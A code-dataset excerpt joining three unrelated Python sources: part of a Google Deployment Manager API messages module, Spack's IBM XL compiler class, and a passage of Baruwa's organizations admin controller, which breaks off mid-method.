error: [Output Only] If errors are generated during processing of the
operation, this field will be populated.
httpErrorMessage: [Output Only] If the operation fails, this field
contains the HTTP error message that was returned, such as NOT FOUND.
httpErrorStatusCode: [Output Only] If the operation fails, this field
contains the HTTP error status code that was returned. For example, a
404 means the resource was not found.
id: [Output Only] The unique identifier for the resource. This identifier
is defined by the server.
insertTime: [Output Only] The time that this operation was requested. This
value is in RFC3339 text format.
kind: [Output Only] Type of the resource. Always compute#operation for
Operation resources.
name: [Output Only] Name of the resource.
operationType: [Output Only] The type of operation, such as insert,
update, or delete, and so on.
progress: [Output Only] An optional progress indicator that ranges from 0
to 100. There is no requirement that this be linear or support any
granularity of operations. This should not be used to guess when the
operation will be complete. This number should monotonically increase as
the operation progresses.
region: [Output Only] The URL of the region where the operation resides.
Only available when performing regional operations.
selfLink: [Output Only] Server-defined URL for the resource.
startTime: [Output Only] The time that this operation was started by the
server. This value is in RFC3339 text format.
status: [Output Only] The status of the operation, which can be one of the
following: PENDING, RUNNING, or DONE.
statusMessage: [Output Only] An optional textual description of the
current status of the operation.
targetId: [Output Only] The unique target ID, which identifies a specific
incarnation of the target resource.
targetLink: [Output Only] The URL of the resource that the operation
modifies. For operations related to creating a snapshot, this points to
the persistent disk that the snapshot was created from.
user: [Output Only] User who requested the operation, for example:
[email protected].
warnings: [Output Only] If warning messages are generated during
processing of the operation, this field will be populated.
zone: [Output Only] The URL of the zone where the operation resides. Only
available when performing per-zone operations.
"""
class ErrorValue(_messages.Message):
"""[Output Only] If errors are generated during processing of the
operation, this field will be populated.
Messages:
ErrorsValueListEntry: A ErrorsValueListEntry object.
Fields:
errors: [Output Only] The array of errors encountered while processing
this operation.
"""
class ErrorsValueListEntry(_messages.Message):
"""A ErrorsValueListEntry object.
Fields:
code: [Output Only] The error type identifier for this error.
location: [Output Only] Indicates the field in the request that caused
the error. This property is optional.
message: [Output Only] An optional, human-readable error message.
"""
code = _messages.StringField(1)
location = _messages.StringField(2)
message = _messages.StringField(3)
errors = _messages.MessageField('ErrorsValueListEntry', 1, repeated=True)
class WarningsValueListEntry(_messages.Message):
"""A WarningsValueListEntry object.
Messages:
DataValueListEntry: A DataValueListEntry object.
Fields:
code: [Output Only] A warning code, if applicable. For example, Compute
Engine returns NO_RESULTS_ON_PAGE if there are no results in the
response.
data: [Output Only] Metadata about this warning in key: value format.
For example: "data": [ { "key": "scope", "value": "zones/us-east1-d" }
message: [Output Only] A human-readable description of the warning code.
"""
class DataValueListEntry(_messages.Message):
"""A DataValueListEntry object.
Fields:
key: [Output Only] A key that provides more detail on the warning
being returned. For example, for warnings where there are no results
in a list request for a particular zone, this key might be scope and
the key value might be the zone name. Other examples might be a key
indicating a deprecated resource and a suggested replacement, or a
warning about invalid network settings (for example, if an instance
attempts to perform IP forwarding but is not enabled for IP
forwarding).
value: [Output Only] A warning data value corresponding to the key.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
code = _messages.StringField(1)
data = _messages.MessageField('DataValueListEntry', 2, repeated=True)
message = _messages.StringField(3)
clientOperationId = _messages.StringField(1)
creationTimestamp = _messages.StringField(2)
description = _messages.StringField(3)
endTime = _messages.StringField(4)
error = _messages.MessageField('ErrorValue', 5)
httpErrorMessage = _messages.StringField(6)
httpErrorStatusCode = _messages.IntegerField(7, variant=_messages.Variant.INT32)
id = _messages.IntegerField(8, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(9)
kind = _messages.StringField(10, default=u'deploymentmanager#operation')
name = _messages.StringField(11)
operationType = _messages.StringField(12)
progress = _messages.IntegerField(13, variant=_messages.Variant.INT32)
region = _messages.StringField(14)
selfLink = _messages.StringField(15)
startTime = _messages.StringField(16)
status = _messages.StringField(17)
statusMessage = _messages.StringField(18)
targetId = _messages.IntegerField(19, variant=_messages.Variant.UINT64)
targetLink = _messages.StringField(20)
user = _messages.StringField(21)
warnings = _messages.MessageField('WarningsValueListEntry', 22, repeated=True)
zone = _messages.StringField(23)
class OperationsListResponse(_messages.Message):
"""A response containing a partial list of operations and a page token used
to build the next request if the request has been truncated.
Fields:
nextPageToken: [Output Only] A token used to continue a truncated list
request.
operations: [Output Only] Operations contained in this list response.
"""
nextPageToken = _messages.StringField(1)
operations = _messages.MessageField('Operation', 2, repeated=True)
class Options(_messages.Message):
"""Options allows customized resource handling by Deployment Manager.
Fields:
inputMappings: The mappings that apply for requests.
nameProperty: The json path to the field in the resource JSON body into
which the resource name should be mapped. Leaving this empty indicates
that there should be no mapping performed.
validationOptions: Options for how to validate and process properties on a
resource.
"""
inputMappings = _messages.MessageField('InputMapping', 1, repeated=True)
nameProperty = _messages.StringField(2)
validationOptions = _messages.MessageField('ValidationOptions', 3)
class Policy(_messages.Message):
"""Defines an Identity and Access Management (IAM) policy. It is used to
specify access control policies for Cloud Platform resources. A `Policy`
consists of a list of `bindings`. A `Binding` binds a list of `members` to a
`role`, where the members can be user accounts, Google groups, Google
domains, and service accounts. A `role` is a named list of permissions
defined by IAM. **Example** { "bindings": [ { "role": "roles/owner",
"members": [ "user:[email protected]", "group:[email protected]",
"domain:google.com", "serviceAccount:my-other-
[email protected]", ] }, { "role": "roles/viewer", "members":
["user:[email protected]"] } ] } For a description of IAM and its features,
see the [IAM developer's guide](https://cloud.google.com/iam).
Fields:
auditConfigs: Specifies cloud audit logging configuration for this policy.
bindings: Associates a list of `members` to a `role`. Multiple `bindings`
must not be specified for the same `role`. `bindings` with no members
will result in an error.
etag: `etag` is used for optimistic concurrency control as a way to help
prevent simultaneous updates of a policy from overwriting each other. It
is strongly suggested that systems make use of the `etag` in the read-
modify-write cycle to perform policy updates in order to avoid race
conditions: An `etag` is returned in the response to `getIamPolicy`, and
systems are expected to put that etag in the request to `setIamPolicy`
to ensure that their change will be applied to the same version of the
policy. If no `etag` is provided in the call to `setIamPolicy`, then
the existing policy is overwritten blindly.
iamOwned:
rules: If more than one rule is specified, the rules are applied in the
following manner: - All matching LOG rules are always applied. - If any
DENY/DENY_WITH_LOG rule matches, permission is denied. Logging will be
applied if one or more matching rule requires logging. - Otherwise, if
any ALLOW/ALLOW_WITH_LOG rule matches, permission is granted. Logging
will be applied if one or more matching rule requires logging. -
Otherwise, if no rule applies, permission is denied.
version: Version of the `Policy`. The default version is 0.
"""
auditConfigs = _messages.MessageField('AuditConfig', 1, repeated=True)
bindings = _messages.MessageField('Binding', 2, repeated=True)
etag = _messages.BytesField(3)
iamOwned = _messages.BooleanField(4)
rules = _messages.MessageField('Rule', 5, repeated=True)
version = _messages.IntegerField(6, variant=_messages.Variant.INT32)
class Resource(_messages.Message):
"""Resource message type.
Messages:
WarningsValueListEntry: A WarningsValueListEntry object.
Fields:
accessControl: The Access Control Policy set on this resource.
finalProperties: [Output Only] The evaluated properties of the resource
with references expanded. Returned as serialized YAML.
id: [Output Only] Unique identifier for the resource; defined by the
server.
insertTime: [Output Only] Timestamp when the resource was created or
acquired, in RFC3339 text format .
manifest: [Output Only] URL of the manifest representing the current
configuration of this resource.
name: [Output Only] The name of the resource as it appears in the YAML
config.
properties: [Output Only] The current properties of the resource before
any references have been filled in. Returned as serialized YAML.
type: [Output Only] The type of the resource, for example
compute.v1.instance, or cloudfunctions.v1beta1.function.
update: [Output Only] If Deployment Manager is currently updating or
previewing an update to this resource, the updated configuration appears
here.
updateTime: [Output Only] Timestamp when the resource was updated, in
RFC3339 text format .
url: [Output Only] The URL of the actual resource.
warnings: [Output Only] If warning messages are generated during
processing of this resource, this field will be populated.
"""
class WarningsValueListEntry(_messages.Message):
"""A WarningsValueListEntry object.
Messages:
DataValueListEntry: A DataValueListEntry object.
Fields:
code: [Output Only] A warning code, if applicable. For example, Compute
Engine returns NO_RESULTS_ON_PAGE if there are no results in the
response.
data: [Output Only] Metadata about this warning in key: value format.
For example: "data": [ { "key": "scope", "value": "zones/us-east1-d" }
message: [Output Only] A human-readable description of the warning code.
"""
class DataValueListEntry(_messages.Message):
"""A DataValueListEntry object.
Fields:
key: [Output Only] A key that provides more detail on the warning
being returned. For example, for warnings where there are no results
in a list request for a particular zone, this key might be scope and
the key value might be the zone name. Other examples might be a key
indicating a deprecated resource and a suggested replacement, or a
warning about invalid network settings (for example, if an instance
attempts to perform IP forwarding but is not enabled for IP
forwarding).
value: [Output Only] A warning data value corresponding to the key.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
code = _messages.StringField(1)
data = _messages.MessageField('DataValueListEntry', 2, repeated=True)
message = _messages.StringField(3)
accessControl = _messages.MessageField('ResourceAccessControl', 1)
finalProperties = _messages.StringField(2)
id = _messages.IntegerField(3, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(4)
manifest = _messages.StringField(5)
name = _messages.StringField(6)
properties = _messages.StringField(7)
type = _messages.StringField(8)
update = _messages.MessageField('ResourceUpdate', 9)
updateTime = _messages.StringField(10)
url = _messages.StringField(11)
warnings = _messages.MessageField('WarningsValueListEntry', 12, repeated=True)
class ResourceAccessControl(_messages.Message):
"""The access controls set on the resource.
Fields:
gcpIamPolicy: The GCP IAM Policy to set on the resource.
"""
gcpIamPolicy = _messages.StringField(1)
class ResourceUpdate(_messages.Message):
"""ResourceUpdate message type.
Messages:
ErrorValue: [Output Only] If errors are generated during update of the
resource, this field will be populated.
WarningsValueListEntry: A WarningsValueListEntry object.
Fields:
accessControl: The Access Control Policy to set on this resource after
updating the resource itself.
error: [Output Only] If errors are generated during update of the
resource, this field will be populated.
finalProperties: [Output Only] The expanded properties of the resource
with reference values expanded. Returned as serialized YAML.
intent: [Output Only] The intent of the resource: PREVIEW, UPDATE, or
CANCEL.
manifest: [Output Only] URL of the manifest representing the update
configuration of this resource.
properties: [Output Only] The set of updated properties for this resource,
before references are expanded. Returned as serialized YAML.
state: [Output Only] The state of the resource.
warnings: [Output Only] If warning messages are generated during
processing of this resource, this field will be populated.
"""
class ErrorValue(_messages.Message):
"""[Output Only] If errors are generated during update of the resource,
this field will be populated.
Messages:
ErrorsValueListEntry: A ErrorsValueListEntry object.
Fields:
errors: [Output Only] The array of errors encountered while processing
this operation.
"""
class ErrorsValueListEntry(_messages.Message):
"""A ErrorsValueListEntry object.
Fields:
code: [Output Only] The error type identifier for this error.
location: [Output Only] Indicates the field in the request that caused
the error. This property is optional.
message: [Output Only] An optional, human-readable error message.
"""
code = _messages.StringField(1)
location = _messages.StringField(2)
message = _messages.StringField(3)
errors = _messages.MessageField('ErrorsValueListEntry', 1, repeated=True)
class WarningsValueListEntry(_messages.Message):
"""A WarningsValueListEntry object.
Messages:
DataValueListEntry: A DataValueListEntry object.
Fields:
code: [Output Only] A warning code, if applicable. For example, Compute
Engine returns NO_RESULTS_ON_PAGE if there are no results in the
response.
data: [Output Only] Metadata about this warning in key: value format.
For example: "data": [ { "key": "scope", "value": "zones/us-east1-d" }
message: [Output Only] A human-readable description of the warning code.
"""
class DataValueListEntry(_messages.Message):
"""A DataValueListEntry object.
Fields:
key: [Output Only] A key that provides more detail on the warning
being returned. For example, for warnings where there are no results
in a list request for a particular zone, this key might be scope and
the key value might be the zone name. Other examples might be a key
indicating a deprecated resource and a suggested replacement, or a
warning about invalid network settings (for example, if an instance
attempts to perform IP forwarding but is not enabled for IP
forwarding).
value: [Output Only] A warning data value corresponding to the key.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
code = _messages.StringField(1)
data = _messages.MessageField('DataValueListEntry', 2, repeated=True)
message = _messages.StringField(3)
accessControl = _messages.MessageField('ResourceAccessControl', 1)
error = _messages.MessageField('ErrorValue', 2)
finalProperties = _messages.StringField(3)
intent = _messages.StringField(4)
manifest = _messages.StringField(5)
properties = _messages.StringField(6)
state = _messages.StringField(7)
warnings = _messages.MessageField('WarningsValueListEntry', 8, repeated=True)
class ResourcesListResponse(_messages.Message):
"""A response containing a partial list of resources and a page token used
to build the next request if the request has been truncated.
Fields:
nextPageToken: A token used to continue a truncated list request.
resources: Resources contained in this list response.
"""
nextPageToken = _messages.StringField(1)
resources = _messages.MessageField('Resource', 2, repeated=True)
class Rule(_messages.Message):
"""A rule to be applied in a Policy.
Fields:
action: Required
conditions: Additional restrictions that must be met
description: Human-readable description of the rule.
ins: If one or more 'in' clauses are specified, the rule matches if the
PRINCIPAL/AUTHORITY_SELECTOR is in at least one of these entries.
logConfigs: The config returned to callers of tech.iam.IAM.CheckPolicy for
any entries that match the LOG action.
notIns: If one or more 'not_in' clauses are specified, the rule matches if
the PRINCIPAL/AUTHORITY_SELECTOR is in none of the entries.
permissions: A permission is a string of form '..' (e.g.,
'storage.buckets.list'). A value of '*' matches all permissions, and a
verb part of '*' (e.g., 'storage.buckets.*') matches all verbs.
"""
action = _messages.StringField(1)
conditions = _messages.MessageField('Condition', 2, repeated=True)
description = _messages.StringField(3)
ins = _messages.StringField(4, repeated=True)
logConfigs = _messages.MessageField('LogConfig', 5, repeated=True)
notIns = _messages.StringField(6, repeated=True)
permissions = _messages.StringField(7, repeated=True)
class StandardQueryParameters(_messages.Message):
"""Query parameters accepted by all methods.
Enums:
AltValueValuesEnum: Data format for the response.
Fields:
alt: Data format for the response.
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters. Overrides userIp if both are provided.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
userIp: IP address of the site where the request originates. Use this if
you want to enforce per-user limits.
"""
class AltValueValuesEnum(_messages.Enum):
"""Data format for the response.
Values:
json: Responses with Content-Type of application/json
"""
json = 0
alt = _messages.EnumField('AltValueValuesEnum', 1, default=u'json')
fields = _messages.StringField(2)
key = _messages.StringField(3)
oauth_token = _messages.StringField(4)
prettyPrint = _messages.BooleanField(5, default=True)
quotaUser = _messages.StringField(6)
trace = _messages.StringField(7)
userIp = _messages.StringField(8)
class TargetConfiguration(_messages.Message):
"""TargetConfiguration message type.
Fields:
config: The configuration to use for this deployment.
imports: Specifies any files to import for this configuration. This can be
used to import templates or other files. For example, you might import a
text file in order to use the file in a template.
"""
config = _messages.MessageField('ConfigFile', 1)
imports = _messages.MessageField('ImportFile', 2, repeated=True)
class TemplateContents(_messages.Message):
"""Files that make up the template contents of a template type.
Fields:
imports: Import files referenced by the main template.
interpreter: Which interpreter (python or jinja) should be used during
expansion.
schema: The contents of the template schema.
template: The contents of the main template file.
"""
imports = _messages.MessageField('ImportFile', 1, repeated=True)
interpreter = _messages.StringField(2)
schema = _messages.StringField(3)
template = _messages.StringField(4)
class TestPermissionsRequest(_messages.Message):
"""A TestPermissionsRequest object.
Fields:
permissions: The set of permissions to check for the 'resource'.
Permissions with wildcards (such as '*' or 'storage.*') are not allowed.
"""
permissions = _messages.StringField(1, repeated=True)
class TestPermissionsResponse(_messages.Message):
"""A TestPermissionsResponse object.
Fields:
permissions: A subset of `TestPermissionsRequest.permissions` that the
caller is allowed.
"""
permissions = _messages.StringField(1, repeated=True)
class Type(_messages.Message):
"""A resource type supported by Deployment Manager.
Fields:
configurableService: Base Type (configurable service) that backs this
Type.
description: An optional textual description of the resource; provided by
the client when the resource is created.
id: [Output Only] Unique identifier for the resource; defined by the
server.
insertTime: [Output Only] Timestamp when the type was created, in RFC3339
text format.
labels: Map of labels; provided by the client when the resource is created
or updated. Specifically: Label keys must be between 1 and 63 characters
long and must conform to the following regular expression:
[a-z]([-a-z0-9]*[a-z0-9])? Label values must be between 0 and 63
characters long and must conform to the regular expression
([a-z]([-a-z0-9]*[a-z0-9])?)?
name: Name of the type.
operation: [Output Only] The Operation that most recently ran, or is
currently running, on this type.
selfLink: [Output Only] Self link for the type.
"""
configurableService = _messages.MessageField('ConfigurableService', 1)
description = _messages.StringField(2)
id = _messages.IntegerField(3, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(4)
labels = _messages.MessageField('TypeLabelEntry', 5, repeated=True)
name = _messages.StringField(6)
operation = _messages.MessageField('Operation', 7)
selfLink = _messages.StringField(8)
class TypeLabelEntry(_messages.Message):
"""A TypeLabelEntry object.
Fields:
key: A string attribute.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
class TypeProvider(_messages.Message):
"""A type provider that describes a service-backed Type.
Fields:
collectionOverrides: Allows resource handling overrides for specific
collections
credential: Credential used when interacting with this type.
description: An optional textual description of the resource; provided by
the client when the resource is created.
descriptorUrl: Descriptor Url for the this type provider.
id: [Output Only] Unique identifier for the resource; defined by the
server.
insertTime: [Output Only] Timestamp when the type provider was created, in
RFC3339 text format.
labels: Map of labels; provided by the client when the resource is created
or updated. Specifically: Label keys must be between 1 and 63 characters
long and must conform to the following regular expression:
[a-z]([-a-z0-9]*[a-z0-9])? Label values must be between 0 and 63
characters long and must conform to the regular expression
([a-z]([-a-z0-9]*[a-z0-9])?)?
name: Name of the type provider.
operation: [Output Only] The Operation that most recently ran, or is
currently running, on this type provider.
options: Options to apply when handling any resources in this service.
selfLink: [Output Only] Self link for the type provider.
"""
collectionOverrides = _messages.MessageField('CollectionOverride', 1, repeated=True)
credential = _messages.MessageField('Credential', 2)
description = _messages.StringField(3)
descriptorUrl = _messages.StringField(4)
id = _messages.IntegerField(5, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(6)
labels = _messages.MessageField('TypeProviderLabelEntry', 7, repeated=True)
name = _messages.StringField(8)
operation = _messages.MessageField('Operation', 9)
options = _messages.MessageField('Options', 10)
selfLink = _messages.StringField(11)
class TypeProviderLabelEntry(_messages.Message):
"""A TypeProviderLabelEntry object.
Fields:
key: A string attribute.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
class TypeProvidersListResponse(_messages.Message):
"""A response that returns all Type Providers supported by Deployment
Manager
Fields:
nextPageToken: A token used to continue a truncated list request.
typeProviders: [Output Only] A list of resource type providers supported
by Deployment Manager.
"""
nextPageToken = _messages.StringField(1)
typeProviders = _messages.MessageField('TypeProvider', 2, repeated=True)
class TypesListResponse(_messages.Message):
"""A response that returns all Types supported by Deployment Manager
Fields:
nextPageToken: A token used to continue a truncated list request.
types: [Output Only] A list of resource types supported by Deployment
Manager.
"""
nextPageToken = _messages.StringField(1)
types = _messages.MessageField('Type', 2, repeated=True)
class ValidationOptions(_messages.Message):
"""Options for how to validate and process properties on a resource.
Fields:
schemaValidation: Customize how deployment manager will validate the
resource against schema errors.
undeclaredProperties: Specify what to do with extra properties when
executing a request.
"""
schemaValidation = _messages.StringField(1)
undeclaredProperties = _messages.StringField(2)
| mit | -3,509,249,219,554,926,600 | 41.094975 | 100 | 0.735296 | false |
LLNL/spack | lib/spack/spack/compilers/xl.py | 3 | 4386 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.compiler import Compiler, UnsupportedCompilerFlag
from spack.version import ver
class Xl(Compiler):
# Subclasses use possible names of C compiler
cc_names = ['xlc']
# Subclasses use possible names of C++ compiler
cxx_names = ['xlC', 'xlc++']
# Subclasses use possible names of Fortran 77 compiler
f77_names = ['xlf']
# Subclasses use possible names of Fortran 90 compiler
fc_names = ['xlf90', 'xlf95', 'xlf2003', 'xlf2008']
# Named wrapper links within build_env_path
link_paths = {'cc': 'xl/xlc',
'cxx': 'xl/xlc++',
'f77': 'xl/xlf',
'fc': 'xl/xlf90'}
version_argument = '-qversion'
version_regex = r'([0-9]?[0-9]\.[0-9])'
@property
def verbose_flag(self):
return "-V"
@property
def debug_flags(self):
return ['-g', '-g0', '-g1', '-g2', '-g8', '-g9']
@property
def opt_flags(self):
return ['-O', '-O0', '-O1', '-O2', '-O3', '-O4', '-O5', '-Ofast']
@property
def openmp_flag(self):
return "-qsmp=omp"
@property
def cxx11_flag(self):
if self.version < ver('13.1'):
raise UnsupportedCompilerFlag(self,
"the C++11 standard",
"cxx11_flag",
"< 13.1")
else:
return "-qlanglvl=extended0x"
@property
def c99_flag(self):
if self.version >= ver('13.1.1'):
return '-std=gnu99'
if self.version >= ver('10.1'):
return '-qlanglvl=extc99'
raise UnsupportedCompilerFlag(self,
'the C99 standard',
'c99_flag',
'< 10.1')
@property
def c11_flag(self):
if self.version >= ver('13.1.2'):
return '-std=gnu11'
if self.version >= ver('12.1'):
return '-qlanglvl=extc1x'
raise UnsupportedCompilerFlag(self,
'the C11 standard',
'c11_flag',
'< 12.1')
@property
def cc_pic_flag(self):
return "-qpic"
@property
def cxx_pic_flag(self):
return "-qpic"
@property
def f77_pic_flag(self):
return "-qpic"
@property
def fc_pic_flag(self):
return "-qpic"
@property
def fflags(self):
# The -qzerosize flag is effective only for the Fortran 77
# compilers and allows the use of zero size objects.
# For Fortran 90 and beyond, it is set by default and has not impact.
# Its use has no negative side effects.
return "-qzerosize"
@classmethod
def fc_version(cls, fc):
# The fortran and C/C++ versions of the XL compiler are always
# two units apart. By this we mean that the fortran release that
# goes with XL C/C++ 11.1 is 13.1. Having such a difference in
# version number is confusing spack quite a lot. Most notably
# if you keep the versions as is the default xl compiler will
# only have fortran and no C/C++. So we associate the Fortran
# compiler with the version associated to the C/C++ compiler.
# One last stumble. Version numbers over 10 have at least a .1
# those under 10 a .0. There is no xlf 9.x or under currently
# available. BG/P and BG/L can such a compiler mix and possibly
# older version of AIX and linux on power.
fortran_version = cls.default_version(fc)
if fortran_version >= 16:
# Starting with version 16.1, the XL C and Fortran compilers
# have the same version. So no need to downgrade the Fortran
# compiler version to match that of the C compiler version.
return str(fortran_version)
c_version = float(fortran_version) - 2
if c_version < 10:
c_version = c_version - 0.1
return str(c_version)
@classmethod
def f77_version(cls, f77):
return cls.fc_version(f77)
| lgpl-2.1 | -4,210,612,487,192,557,600 | 32.738462 | 77 | 0.546968 | false |
TetraAsh/baruwa2 | baruwa/controllers/organizations.py | 1 | 17571 | # -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4
# Baruwa - Web 2.0 MailScanner front-end.
# Copyright (C) 2010-2012 Andrew Colin Kissa <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"Organizations controller"
import os
import shutil
import socket
import struct
import logging
from urlparse import urlparse
from pylons import request, response, session, tmpl_context as c, url, config
from pylons.controllers.util import abort, redirect
from pylons.i18n.translation import _
from webhelpers import paginate
from celery.result import AsyncResult
from sqlalchemy.orm import joinedload
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import NoResultFound
from repoze.what.predicates import All, not_anonymous
from sphinxapi import SphinxClient, SPH_MATCH_EXTENDED2
from repoze.what.plugins.pylonshq import ControllerProtector
from baruwa.lib.dates import now
from baruwa.lib.base import BaseController, render
from baruwa.lib.helpers import flash, flash_info, flash_alert
from baruwa.lib.query import clean_sphinx_q, restore_sphinx_q
from baruwa.lib.misc import check_num_param
from baruwa.lib.misc import iscsv, convert_org_to_json
from baruwa.model.meta import Session
from baruwa.lib.audit import audit_log
from baruwa.lib.auth.predicates import OnlySuperUsers
from baruwa.tasks.settings import update_serial
from baruwa.model.accounts import Group, User, Relay
from baruwa.model.domains import Domain
from baruwa.forms.organizations import OrgForm, RelayForm, RelayEditForm
from baruwa.forms.organizations import DelOrgForm
from baruwa.forms.organizations import ImportCSVForm
from baruwa.tasks import importdomains
from baruwa.lib.audit.msgs.organizations import *
log = logging.getLogger(__name__)
@ControllerProtector(All(not_anonymous(), OnlySuperUsers()))
class OrganizationsController(BaseController):
def __before__(self):
"set context"
BaseController.__before__(self)
if self.identity:
c.user = self.identity['user']
else:
c.user = None
c.selectedtab = 'organizations'
def _get_org(self, orgid):
"Get organization"
try:
org = Session.query(Group).options(
joinedload('domains')).get(orgid)
except NoResultFound:
org = None
return org
def _get_setting(self, settingid):
"Get relay settings"
try:
setting = Session.query(Relay).options(
joinedload('org')).get(settingid)
except NoResultFound:
setting = None
return setting
def index(self, page=1, format=None):
"index page"
total_found = 0
search_time = 0
num_items = session.get('organizations_num_items', 10)
q = request.GET.get('q', None)
kwds = {}
if q:
kwds['presliced_list'] = True
conn = SphinxClient()
conn.SetMatchMode(SPH_MATCH_EXTENDED2)
if page == 1:
conn.SetLimits(0, num_items, 500)
else:
page = int(page)
offset = (page - 1) * num_items
conn.SetLimits(offset, num_items, 500)
q = clean_sphinx_q(q)
try:
results = conn.Query(q, 'organizations, organizations_rt')
except (socket.timeout, struct.error):
redirect(request.path_qs)
q = restore_sphinx_q(q)
if results and results['matches']:
ids = [hit['id'] for hit in results['matches']]
orgs = Session.query(Group)\
.filter(Group.id.in_(ids))\
.all()
total_found = results['total_found']
search_time = results['time']
orgcount = total_found
else:
orgs = []
ocount = 0
orgcount = 0
else:
orgs = Session.query(Group)
ocount = Session.query(Group.id)
if not 'orgcount' in locals():
orgcount = ocount.count()
items = paginate.Page(orgs, page=int(page),
items_per_page=num_items,
item_count=orgcount,
**kwds)
if format == 'json':
response.headers['Content-Type'] = 'application/json'
data = convert_org_to_json(items)
return data
c.page = items
c.q = q
c.total_found = total_found
c.search_time = search_time
return render('/organizations/index.html')
def detail(self, orgid):
"Organization details"
org = self._get_org(orgid)
if not org:
abort(404)
c.org = org
return render('/organizations/detail.html')
def new(self):
"Add an organization"
c.form = OrgForm(request.POST, csrf_context=session)
c.form.domains.query = Session.query(Domain)
c.form.admins.query = Session.query(User).filter(
User.account_type == 2)
if request.POST and c.form.validate():
try:
org = Group()
org.name = c.form.name.data
org.domains = c.form.domains.data
Session.add(org)
Session.commit()
info = ADDORG_MSG % dict(o=org.name)
audit_log(c.user.username,
3, unicode(info), request.host,
request.remote_addr, now())
flash(_('The organization has been created'))
redirect(url(controller='organizations'))
except IntegrityError:
Session.rollback()
flash_alert(_('The organization already exists'))
return render('/organizations/add.html')
def edit(self, orgid):
"Edit an organization"
org = self._get_org(orgid)
if not org:
abort(404)
c.form = OrgForm(request.POST, org, csrf_context=session)
c.form.domains.query = Session.query(Domain)
c.form.admins.query = Session.query(User).filter(
User.account_type == 2)
c.id = org.id
if request.POST and c.form.validate():
updated = False
for field in c.form:
if (field.name != 'csrf_token' and
field.data != getattr(org, field.name)):
setattr(org, field.name, field.data)
updated = True
if updated:
try:
Session.add(org)
Session.commit()
info = UPDATEORG_MSG % dict(o=org.name)
audit_log(c.user.username,
2, unicode(info), request.host,
request.remote_addr, now())
flash(_('The organization has been updated'))
except IntegrityError:
Session.rollback()
flash(_('The organization could not be updated'))
else:
flash_info(_('No changes made, Organization not updated'))
redirect(url(controller='organizations'))
return render('/organizations/edit.html')
def delete(self, orgid):
"Delete an organization"
org = self._get_org(orgid)
if not org:
abort(404)
c.form = DelOrgForm(request.POST, org, csrf_context=session)
c.form.domains.query = Session.query(Domain)
c.form.admins.query = Session.query(User).filter(
User.account_type == 2)
c.id = org.id
if request.POST and c.form.validate():
org_name = org.name
if c.form.delete_domains.data:
for domain in org.domains:
Session.delete(domain)
Session.delete(org)
Session.commit()
info = DELETEORG_MSG % dict(o=org_name)
audit_log(c.user.username,
4, unicode(info), request.host,
request.remote_addr, now())
flash(_('The organization has been deleted'))
redirect(url(controller='organizations'))
else:
flash(_('The organization: %(s)s will be deleted,'
' This action is not reversible') % dict(s=org.name))
return render('/organizations/delete.html')
def add_relay(self, orgid):
"Add a mail relay"
org = self._get_org(orgid)
if not org:
abort(404)
c.form = RelayForm(request.POST, csrf_context=session)
if request.POST and c.form.validate():
try:
outbound = Relay()
outbound.address = c.form.address.data
outbound.username = c.form.username.data
outbound.enabled = c.form.enabled.data
outbound.description = c.form.description.data
outbound.org = org
if c.form.password1.data:
outbound.set_password(c.form.password1.data)
Session.add(outbound)
Session.commit()
relay_name = c.form.address.data or c.form.username.data
info = ADDRELAY_MSG % dict(r=relay_name)
audit_log(c.user.username,
3, unicode(info), request.host,
request.remote_addr, now())
flash(_('The outbound settings have been created'))
except IntegrityError:
Session.rollback()
flash(_('The outbound settings could not created, Try again'))
redirect(url('org-detail', orgid=orgid))
c.orgid = org.id
c.orgname = org.name
return render('/organizations/addrelay.html')
def edit_relay(self, settingid):
"Edit a mail relay"
relay = self._get_setting(settingid)
if not relay:
abort(404)
c.form = RelayEditForm(request.POST, relay, csrf_context=session)
c.relayname = relay.address or relay.username
c.relayid = relay.id
c.orgid = relay.org_id
if request.POST and c.form.validate():
updated = False
for field in c.form:
if field.name == 'csrf_token':
continue
if (not field.name in ['password1', 'password2'] and
field.data != getattr(relay, field.name)):
setattr(relay, field.name, field.data)
updated = True
if field.name == 'password1' and field.data != '':
relay.set_password(field.data)
updated = True
if updated:
try:
Session.add(relay)
Session.commit()
info = UPDATERELAY_MSG % dict(r=c.relayname)
audit_log(c.user.username,
2, unicode(info), request.host,
request.remote_addr, now())
flash(_('The outbound settings have been updated'))
except IntegrityError:
Session.rollback()
flash(_('The outbound settings could not be updated'))
else:
flash(_('No changes made, The outbound settings not updated'))
redirect(url('org-detail', orgid=relay.org_id))
return render('/organizations/editrelay.html')
def delete_relay(self, settingid):
"Delete a mail relay"
relay = self._get_setting(settingid)
if not relay:
abort(404)
c.form = RelayForm(request.POST, relay, csrf_context=session)
c.relayname = relay.address or relay.username
c.relayid = relay.id
c.orgid = relay.org_id
if request.POST and c.form.validate():
orgid = relay.org_id
try:
Session.delete(relay)
Session.commit()
